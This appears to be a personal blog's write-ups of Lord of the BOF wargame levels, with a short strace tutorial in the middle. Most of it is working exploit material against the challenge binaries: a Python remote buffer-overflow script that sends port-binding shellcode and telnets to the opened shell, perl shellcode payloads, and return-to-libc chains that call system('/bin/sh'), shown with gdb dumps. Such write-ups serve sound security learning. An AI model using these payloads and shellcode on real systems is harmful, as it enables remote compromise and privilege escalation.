At first I thought I should be getting a shell but didn't, so I searched the internet a bit. It turns out that shellcode which, instead of handing the privileges, uh.. how should I put it, directly to the program you connected to, binds to another port, leaves it listening, and only gives you a connection when you connect to that port is called port binding shellcode. There was a similar question on Stack Overflow, which is how I learned I had to use port-binding shellcode. I found the shellcode at http://shell-storm.org/shellcode/files/shellcode-217.php.



[xavius@localhost xavius]$ cat death_knight.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - dark knight
        - remote BOF
*/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <dumpcode.h>

main()
{
        char buffer[40];

        int server_fd, client_fd;
        struct sockaddr_in server_addr;
        struct sockaddr_in client_addr;
        int sin_size;

        if((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
                perror("socket");
                exit(1);
        }

        server_addr.sin_family = AF_INET;
        server_addr.sin_port = htons(6666);
        server_addr.sin_addr.s_addr = INADDR_ANY;
        bzero(&(server_addr.sin_zero), 8);

        if(bind(server_fd, (struct sockaddr *)&server_addr, sizeof(struct sockaddr)) == -1){
                perror("bind");
                exit(1);
        }

        if(listen(server_fd, 10) == -1){
                perror("listen");
                exit(1);
        }

        while(1) {
                sin_size = sizeof(struct sockaddr_in);
                if((client_fd = accept(server_fd, (struct sockaddr *)&client_addr, &sin_size)) == -1){
                        perror("accept");
                        continue;
                }

                if (!fork()){
                        send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);
                        send(client_fd, "You : ", 6, 0);
                        recv(client_fd, buffer, 256, 0);   /* up to 256 bytes into a 40-byte buffer */
                        close(client_fd);
                        break;
                }

                close(client_fd);
                while(waitpid(-1,NULL,WNOHANG) > 0);
        }
        close(server_fd);
}

I'm hopeless with complicated code, and this looked complicated the moment I saw it lol.... I need to study programming harder.

Since my goal was just to clear it, I skipped the perror parts, i.e. the parts that print error messages. The source above them is the part that sets up the socket.

So the part to look at is this:

                if (!fork()){
                        send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);
                        send(client_fd, "You : ", 6, 0);
                        recv(client_fd, buffer, 256, 0);
                        close(client_fd);
                        break;
                }

Looking here, you can see it sends 52 bytes and 6 bytes, then receives 256 bytes.

The buffer is 40 bytes, so this is where the buffer overflow happens.

The code I initially grinded with was this:

#!/usr/bin/python

from socket import *
import struct, sys

#s = socket(AF_INET, SOCK_STREAM)
payload='\x90'*44 #space

#96 bytes of shellcode
shellcode="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"

p = lambda x : struct.pack("<I", x)

#payload= nop 44 ret_addr 4 nop 110 shellcode 96
#s.connect(("192.168.10.129",6666))

print "Connecting.."

for address in range (0xbffff000, 0xbfffffff):
        payload+=p(address)
        payload+='\x90'*110
        payload+=shellcode

        s = socket(AF_INET, SOCK_STREAM)
        s.connect(("192.168.10.129",6666))
        print s.recv(52)
        print s.recv(6)
        s.send(payload)

s.close()


The part p = lambda x : struct.pack("<I", x) converts the address into little-endian format.

I just built it like a payload: 44 nops, the return address, 110 nops, and then the shellcode.

As for the for address in range below: looking it up now, it seems there's a way to find the address using the dumpcode in the problem's code, but at the time I couldn't see any way to get the address and felt stuck, so I just brute-forced it..

And then it sends the payload.

But when I ran it,

Death Knight : Not even death can save you from me!

You : 

was all that came up, over and over, and I couldn't get a shell. After realizing I had to connect to the bound port, I changed the source.

Administratorui-MacBook-Pro-2:~ EverTokki$ vi exploit_lob.py 


#!/usr/bin/python

from socket import *
import struct, sys
import os

#s = socket(AF_INET, SOCK_STREAM)

payload='\x90'*44 #space

#96 bytes of shellcode
shellcode="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"

p = lambda x : struct.pack("<I", x)

#payload= nop 44 ret_addr 4 nop 112 shellcode 96
#s.connect(("192.168.10.129",6666))

print "Connecting.."

for address in range (0xbffff000, 0xbfffffff):
        payload+=p(address)
        payload+='\x90'*110
        payload+=shellcode

        s = socket(AF_INET, SOCK_STREAM)
        s.connect(("192.168.10.129",6666))
        print s.recv(52)
        print s.recv(6)
        s.send(payload)

        os.system("telnet 192.168.10.129 31337")

#s.close()

#close connection


What surprised me was that the shell came up right away. Also that plain input did not work: I had to type it in the form command; for it to get through.

Administratorui-MacBook-Pro-2:~ EverTokki$ python exploit_lob.py 
Connecting..
Death Knight : Not even death can save you from me!

You : 
Trying 192.168.10.129...
Connected to 192.168.10.129.
Escape character is '^]'.
ls
: command not found
ls;
bin
boot
dev
etc
home
lib
lost+found
mnt
opt
proc
root
sbin
tmp
usr
var
my-pass;
euid = 520

When I typed exit, the brute force just kept on running haha

Then I tried it again afterwards and it didn't work???

??

???It really doesn't work. Did I break something?

Anyway, solving it was really fun..


login: death_knight
Password:
[death_knight@localhost death_knight]$ ls
dropped_item.txt
[death_knight@localhost death_knight]$ cat dropped_item.txt

 You're so great! This is a token to the next gate.

                   ,.
                 ,'  `.
               ,' _<>_ `.
             ,'.-'____`-.`.
           ,'_.-''    ``-._`.
         ,','      /\      `.`.
       ,' /.._  O /  \ O  _.,\ `.
     ,'/ /  \ ``-;.--.:-'' /  \ \`.
   ,' : :    \  /\`.,'/\  /    : : `.
  < <>| |   O >(< (  ) >)< O   | |<> >
   `. : :    /  \/,'`.\/  \    ; ; ,'
     `.\ \  /_..-:`--';-.._\  / /,'
       `. \`'   O \  / O   `'/ ,'
         `.`._     \/     _,','
           `..``-.____.-'',,'
             `.`-.____.-','
               `.  <>  ,'
                 `.  ,'
                   `'

[death_knight@localhost death_knight]$


End of the RedHat 6.2 journey.

I have an exam tomorrow and after doing this it is already 1 AM. I'm in trouble.

Posted by 에버토끼
Hang on everyone, this level is weird.

Passing it to stdin through cat is right, and after getting the hint from Poplet to use strace and getting a feel for it I attacked, but not even a segmentation fault came up. Hmm, I clearly put in 48 bytes. And another weird thing: wondering whether the shellcode was the problem, I tried the shellcode from the writeup. (I borrowed Sanguine's shellcode for a moment.) Have a look at the log.


[nightmare@localhost nightmare]$ bash2
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xerath

¸ù¿@P1P¸@PP@

[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28,"\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x01\x50\x01\x40"';cat)|./xavius

¸ù¿@P1P¸@PP@

[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28,"\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x01\x50\x01\x40"';cat)|./xavius

¸ù¿@P1P¸@PP@








ㅁㄴㅇ
/bin/sh: ㅁㄴㅇ: command not found
ㄹmy-pass
/bin/sh: ㄹmy-pass: command not found
my-pass
euid = 519
throw me away
q
/bin/sh: q: command not found
exit
exit


After hitting enter a bunch of times it ended up like that..? Then a little later I tried again


[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xerath

¸ù¿@P1P¸@PP@

[nightmare@localhost nightmare]$

??



..and while writing this, I realised..

the difference between "' ; cat) and "';cat)..

Ha....

No wait, that doesn't seem to be the problem. It is some kind of format problem, but I'm not sure it is the spacing..?

But it doesn't work with other shellcode. Why is that? Could it be that 2f doesn't get through when it is passed over a pipe?

Anyway, glad it's solved! It looked hopeless the first time I saw it, but it worked out


Log (unedited)



I'll be following http://www.linuxintro.org/wiki/Strace !


As I write this I have no idea how to use strace at all. All I know is that you can run it with strace <file>.

So let's do it together. Let's write a hello world program and analyse it.

[nightmare@localhost nightmare]$ cat hello.c
#include<stdio.h>

int main()
{
        printf ("Hello, World!\n");
        return 0;
}


Compile it and run strace ./filename to get the raw output first.


[nightmare@localhost nightmare]$ strace ./hello
execve("./hello", ["./hello"], [/* 22 vars */]) = 0
brk(0)                                  = 0x8049548
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0
old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000
close(3)                                = 0
open("/lib/libc.so.6", O_RDONLY)        = 3
fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096
old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000
mprotect(0x40105000, 30812, PROT_NONE)  = 0
old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000
old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000
close(3)                                = 0
mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0
mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0
munmap(0x40015000, 12210)               = 0
personality(PER_LINUX)                  = 0
getpid()                                = 1120
fstat64(0x1, 0xbffff364)                = -1 ENOSYS (Function not implemented)
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000
ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0
write(1, "Hello, World!\n", 14Hello, World!
)         = 14
munmap(0x40015000, 4096)                = 0
_exit(0)                                = ?


"To analyze strace's output you must know that the first keyword in a line of output from strace is always a syscall like open or read. Then, in parentheses, the arguments follow, then the result."

So the first keyword of each strace output line is the system call, and inside the parentheses are the arguments that get passed. After that, it says, comes the result. The part after the = is presumably the result?

Haha, it says exactly that.


"Every line follows the syntax
syscall(arguments) = return value"

It also kindly says that if you don't know what a system call does, look it up with man 2 <systemcall>.
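As an added example (not from this post, the linuxintro wiki, or strace itself), here is a small Python parser for that syscall(arguments) = return value line shape, run over a few lines copied from the strace output above. It pulls out the call name, the argument list, the return value and, for failed calls, the errno, and lists the open() calls that failed, which is the first thing to check when a traced program cannot find a file.

```python
import re

# Lines copied from the strace output above (constructed sample input for the demo).
SAMPLE = r'''execve("./hello", ["./hello"], [/* 22 vars */]) = 0
brk(0)                                  = 0x8049548
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0
open("/lib/libc.so.6", O_RDONLY)        = 3
write(1, "Hello, World!\n", 14)         = 14
_exit(0)                                = ?'''

# name(args) = ret [ERRNO (message)]
LINE_RE = re.compile(r'^(?P<name>\w+)\((?P<args>.*)\)\s*=\s*(?P<ret>\S+)'
                     r'(?:\s+(?P<err>E[A-Z]+)\s+\((?P<msg>[^)]*)\))?\s*$')

def split_args(s):
    """Split on top-level commas only: commas inside strings, [...] and {...} stay put."""
    args, cur, depth, quote, i = [], [], 0, None, 0
    while i < len(s):
        ch = s[i]
        cur.append(ch)
        if quote:                          # inside a "..." string: keep escapes verbatim
            if ch == '\\':
                i += 1
                cur.append(s[i])
            elif ch == quote:
                quote = None
        elif ch == '"':
            quote = ch
        elif ch in '([{':
            depth += 1
        elif ch in ')]}':
            depth -= 1
        elif ch == ',' and depth == 0:
            cur.pop()                      # drop the separating comma itself
            args.append(''.join(cur).strip())
            cur = []
        i += 1
    if cur:
        args.append(''.join(cur).strip())
    return args

def parse_line(line):
    """{name, args, ret, errno, errmsg} for one strace line, or None if it is not a syscall line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    try:
        ret = int(m.group('ret'), 0)       # decimal or 0x... return value
    except ValueError:
        ret = None                         # '?': the call never returned (_exit)
    return {'name': m.group('name'), 'args': split_args(m.group('args')),
            'ret': ret, 'errno': m.group('err'), 'errmsg': m.group('msg')}

def failed_opens(text):
    """(path, errno) for every open() that failed, e.g. a library or config file not found."""
    out = []
    for call in map(parse_line, text.splitlines()):
        if call and call['name'] == 'open' and call['ret'] == -1:
            out.append((call['args'][0].strip('"'), call['errno']))
    return out
```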

Uh.. come to think of it, that's all there is?

Whoa?

Done.


analysis

But old_mmap, mmap and munmap look like the same sort of thing and I can't quite get a feel for what they do. And I don't know why I kept avoiding strace.. all this time. You really do have to just try things. I'd been too scared to touch it hahahahaha.. oh well.


++) mmap seems to allocate memory in memory for some device to use; so does it create the space that each function, i.e. open, read, write and so on, uses? Looking at the strace above, there is one before each of the functions runs..


Is this vacation hell or what, why am I being handed trials like this, why am I not doing my academy homework


[succubus@localhost succubus]$ ls
nightmare  nightmare.c
[succubus@localhost succubus]$ cat nightmare.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - nightmare
        - PLT
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dumpcode.h>

main(int argc, char *argv[])
{
        char buffer[40];
        char *addr;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // check address
        addr = (char *)&strcpy;
        if(memcmp(argv[1]+44, &addr, 4) != 0){
                printf("You must fall in love with strcpy()\n");
                exit(0);
        }// the ret right after the buffer must be strcpy; judging from the hint in the header comment, that means use the PLT address

        // overflow!
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // dangerous waterfall
        memset(buffer+40+8, 'A', 4);
}

[succubus@localhost succubus]$ cp nightmare fightmare
[succubus@localhost succubus]$ gdb -q fightmare
(gdb) b main
Breakpoint 1 at 0x80486ba
(gdb) r
Starting program: /home/succubus/fightmare

Breakpoint 1, 0x80486ba in main ()
(gdb) p strcpy
$1 = {char *(char *, char *)} 0x400767b0 <strcpy>
(gdb) disas main
Dump of assembler code for function main:
0x80486b4 <main>:       push   %ebp
0x80486b5 <main+1>:     mov    %esp,%ebp
0x80486b7 <main+3>:     sub    $0x2c,%esp
0x80486ba <main+6>:     cmpl   $0x1,0x8(%ebp)
0x80486be <main+10>:    jg     0x80486d7 <main+35>
0x80486c0 <main+12>:    push   $0x80487db
0x80486c5 <main+17>:    call   0x80483e0 <printf>
0x80486ca <main+22>:    add    $0x4,%esp
0x80486cd <main+25>:    push   $0x0
0x80486cf <main+27>:    call   0x80483f0 <exit>
0x80486d4 <main+32>:    add    $0x4,%esp
0x80486d7 <main+35>:    movl   $0x8048410,0xffffffd4(%ebp)
0x80486de <main+42>:    push   $0x4
0x80486e0 <main+44>:    lea    0xffffffd4(%ebp),%eax
0x80486e3 <main+47>:    push   %eax
0x80486e4 <main+48>:    mov    0xc(%ebp),%eax
0x80486e7 <main+51>:    add    $0x4,%eax
0x80486ea <main+54>:    mov    (%eax),%edx
0x80486ec <main+56>:    add    $0x2c,%edx
0x80486ef <main+59>:    push   %edx
0x80486f0 <main+60>:    call   0x80483c0 <memcmp>
0x80486f5 <main+65>:    add    $0xc,%esp
0x80486f8 <main+68>:    mov    %eax,%eax
0x80486fa <main+70>:    test   %eax,%eax
0x80486fc <main+72>:    je     0x8048715 <main+97>
0x80486fe <main+74>:    push   $0x8048800
0x8048703 <main+79>:    call   0x80483e0 <printf>
0x8048708 <main+84>:    add    $0x4,%esp
0x804870b <main+87>:    push   $0x0
0x804870d <main+89>:    call   0x80483f0 <exit>
0x8048712 <main+94>:    add    $0x4,%esp
0x8048715 <main+97>:    mov    0xc(%ebp),%eax
0x8048718 <main+100>:   add    $0x4,%eax
0x804871b <main+103>:   mov    (%eax),%edx
0x804871d <main+105>:   push   %edx
0x804871e <main+106>:   lea    0xffffffd8(%ebp),%eax
---Type <return> to continue, or q <return> to quit---
0x8048721 <main+109>:   push   %eax
0x8048722 <main+110>:   call   0x8048410 <strcpy> // no @plt suffix shown, but I have a feeling this is it
0x8048727 <main+115>:   add    $0x8,%esp
0x804872a <main+118>:   lea    0xffffffd8(%ebp),%eax
0x804872d <main+121>:   push   %eax
0x804872e <main+122>:   push   $0x8048825
0x8048733 <main+127>:   call   0x80483e0 <printf>
0x8048738 <main+132>:   add    $0x8,%esp
0x804873b <main+135>:   push   $0x4
0x804873d <main+137>:   push   $0x41
0x804873f <main+139>:   lea    0xffffffd8(%ebp),%eax
0x8048742 <main+142>:   lea    0x30(%eax),%edx
0x8048745 <main+145>:   push   %edx
0x8048746 <main+146>:   call   0x8048400 <memset>
0x804874b <main+151>:   add    $0xc,%esp
0x804874e <main+154>:   leave
0x804874f <main+155>:   ret
End of assembler dump.
(gdb) q
The program is running.  Exit anyway? (y or n) y

[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\x90"x44, "\x10\x84\x04\x08"'`
„// tried it and it works. nice
/* This is where I had to think. The program above, after strcpy runs, fills the spot where the ret address goes with A's. But why strcpy of all things? Presumably because we are meant to use it? There is no limit on the argument either, so I came to think the idea is to use strcpy to put an address where ret goes. So at first I tried putting the system address and the /bin/sh address after strcpy's two arguments, but that didn't work. So I just put them at the front. */
Segmentation fault (core dumped)

[succubus@localhost succubus]$ gdb -q fightmare
(gdb) b main
Breakpoint 1 at 0x80486ba
(gdb) r
Starting program: /home/succubus/fightmare

Breakpoint 1, 0x80486ba in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) q
The program is running.  Exit anyway? (y or n) y


/* I made such a mess in the middle that rather than redact it I just deleted it all.... */


[succubus@localhost succubus]$export BINSH=`perl -e 'print "/bin/sh"'`
bash2: export: command not found
[succubus@localhost succubus]$ export BINSH=`perl -e 'print "/bin/sh"'`
[succubus@localhost succubus]$ ls
core  fightmare  nightmare  nightmare.c
[succubus@localhost succubus]$ vi foo.c
[succubus@localhost succubus]$ gcc foo.c -o foo
foo.c: In function `main':
foo.c:5: warning: assignment makes pointer from integer without a cast
[succubus@localhost succubus]$ ./foo BINSH
0xbffffc7c
[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\x90"x44, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xdc\xfa\xff\xbf", "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf"  '`
AAAAúú ¿úú ¿@BBBB|ü ¿
Segmentation fault (core dumped)


[succubus@localhost succubus]$ gdb -q -c core
Core was generated by `./fightmare AAAAúú ¿úú ¿@BBB'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) x/40wx $esp-80
0xbffffa74:     0xbffffb04      0xbffffab8      0x0804874b      0xbffffac0
0xbffffa84:     0x00000041      0x00000004      0x08048410      0x90909090
0xbffffa94:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffaa4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffab4:     0x90909090      0x4000ae60      0x90909090      0x41414141
0xbffffac4:     0xbffffad0      0xbffffadc      0x40058ae0      0x08048441
0xbffffad4:     0x080486b4      0x00000002      0x08048441      0x080486b4
0xbffffae4:     0x00000002      0xbffffb04      0x08048350      0x0804877c
0xbffffaf4:     0x4000ae60      0xbffffafc      0x40013e90      0x00000002
0xbffffb04:     0xbffffc02      0xbffffc0e      0x00000000      0xbffffc57
(gdb) x/wx 0xbffffa90
0xbffffa90:     0x90909090
(gdb) q


[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\x98\xfa\xff\xbf"'`
@BBBB|ü ¿AAAAúú ¿˜ú ¿
Segmentation fault (core dumped)
[succubus@localhost succubus]$ gdb -q -c core
Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿˜ú ¿'.

Program terminated with signal 11, Segmentation fault.
#0  0x41410004 in ?? () // doesn't change much
(gdb) q


[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xac\xfa\xff\xbf"'`
@BBBB|ü ¿AAAAúú ¿¬ú ¿
Segmentation fault (core dumped)
[succubus@localhost succubus]$ gdb -q -c core
Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿¬ú ¿'.
Program terminated with signal 11, Segmentation fault.
#0  0x90909090 in ?? ()
(gdb) x/40wx 0xbffffaac
0xbffffaac:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffabc:     0x90909090      0x90909090      0x90909090      0x4000ae60
0xbffffacc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffadc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffaec:     0x0800ae60      0x080486b4      0x00000002      0xbffffb14
0xbffffafc:     0x08048350      0x0804877c      0x4000ae60      0xbffffb0c
0xbffffb0c:     0x40013e90      0x00000002      0xbffffc0e      0xbffffc1a
0xbffffb1c:     0x00000000      0xbffffc57      0xbffffc6a      0xbffffc78
0xbffffb2c:     0xbffffc90      0xbffffcaf      0xbffffcd1      0xbffffcdf
0xbffffb3c:     0xbffffea2      0xbffffec1      0xbffffedf      0xbffffef4
(gdb) x/40wx 0xbffffaa8
0xbffffaa8:     0xbffffc7c      0x90909090      0x90909090      0x90909090
0xbffffab8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffac8:     0x4000ae60      0x90909090      0x90909090      0x90909090
0xbffffad8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffae8:     0x90909090      0x0800ae60      0x080486b4      0x00000002
0xbffffaf8:     0xbffffb14      0x08048350      0x0804877c      0x4000ae60
0xbffffb08:     0xbffffb0c      0x40013e90      0x00000002      0xbffffc0e
0xbffffb18:     0xbffffc1a      0x00000000      0xbffffc57      0xbffffc6a
0xbffffb28:     0xbffffc78      0xbffffc90      0xbffffcaf      0xbffffcd1
0xbffffb38:     0xbffffcdf      0xbffffea2      0xbffffec1      0xbffffedf
(gdb) x/40wx 0xbffffaa0
0xbffffaa0:     0x40058ae0      0x42424242      0xbffffc7c      0x90909090
0xbffffab0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffac0:     0x90909090      0x90909090      0x4000ae60      0x90909090
0xbffffad0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffae0:     0x90909090      0x90909090      0x90909090      0x0800ae60
0xbffffaf0:     0x080486b4      0x00000002      0xbffffb14      0x08048350
0xbffffb00:     0x0804877c      0x4000ae60      0xbffffb0c      0x40013e90
0xbffffb10:     0x00000002      0xbffffc0e      0xbffffc1a      0x00000000
0xbffffb20:     0xbffffc57      0xbffffc6a      0xbffffc78      0xbffffc90
0xbffffb30:     0xbffffcaf      0xbffffcd1      0xbffffcdf      0xbffffea2
(gdb) q

[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`
@BBBB|ü ¿AAAAúú ¿ ú ¿
Segmentation fault (core dumped)
[succubus@localhost succubus]$ gdb -q -c core
Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿ ú ¿'.
Program terminated with signal 11, Segmentation fault.
#0  0x42424242 in ?? ()/* something isn't right. But I just had a feeling that the argument passed to system was wrong and that was why.... */
(gdb) q


[succubus@localhost succubus]$ gdb -q -c core
Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿ ú ¿'.
Program terminated with signal 11, Segmentation fault.
#0  0x42424242 in ?? ()
(gdb) x/s 0xbffffc7c
0xbffffc7c:      "TEHOST=192.168.10.1" /* foo.c, what on earth is this address you gave me.. */
(gdb) x/5s 0xbffffc7c
0xbffffc7c:      "TEHOST=192.168.10.1"
0xbffffc90:      "HOSTNAME=localhost.localdomain"
0xbffffcaf:      "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffcd1:      "USER=succubus"
0xbffffcdf:      "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...

(gdb) x/5s 0xbffffc70
0xbffffc70:      "/bin/sh"
0xbffffc78:      "REMOTEHOST=192.168.10.1"
0xbffffc90:      "HOSTNAME=localhost.localdomain"
0xbffffcaf:      "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffcd1:      "USER=succubus"
(gdb) q


[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x70\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`
@BBBBpü ¿AAAAúú ¿ ú ¿
bash$ exit
exit
Segmentation fault (core dumped)
[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x70\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`
@BBBBpü ¿AAAAúú ¿ ú ¿
bash$ my-pass
euid = 518


Good good


